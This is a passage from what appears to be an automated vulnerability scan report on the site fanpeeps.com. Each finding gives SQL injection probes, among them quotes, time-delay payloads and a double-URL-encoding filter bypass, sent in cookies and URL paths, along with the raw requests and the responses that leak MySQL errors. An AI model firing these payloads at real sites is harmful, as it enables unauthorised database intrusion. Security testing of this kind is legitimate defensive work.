<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.17. http://fanpeeps.com/bg2.jpg [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/?action=news&pid=18&iid=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:32:38 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.18. http://fanpeeps.com/bg2.jpg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /bg2.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /bg2.jpg?1,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://fanpeeps.com/worldcup
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=181893936.1520938759.1305373774.1305373774.1305373774.1; __utmc=181893936; __utmb=181893936.1.10.1305373774

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 11:50:03 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17318

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.19. http://fanpeeps.com/function.fopen [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.20. http://fanpeeps.com/function.fopen [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:17 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17952

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.21. http://fanpeeps.com/function.fopen [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18102

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.22. http://fanpeeps.com/function.fopen [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17181

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.23. http://fanpeeps.com/function.fopen [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /function.fopen

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload )waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /function.fopen?1)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:45:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17361

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.24. http://fanpeeps.com/greybox/AJS.js [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17272

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.25. http://fanpeeps.com/greybox/AJS.js [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380';

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17300

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380'';

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.26. http://fanpeeps.com/greybox/AJS.js [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936,0,0)waitfor%20delay'0%3a0%3a20'--; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17290

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.27. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17263

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 91517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.28. http://fanpeeps.com/greybox/AJS.js [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/AJS.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17185

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox/AJS.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.29. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /greybox'/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17392

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /greybox''/gb_scripts.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:32 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.30. http://fanpeeps.com/greybox/gb_scripts.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /greybox/gb_scripts.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /greybox/gb_scripts.js',0,0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
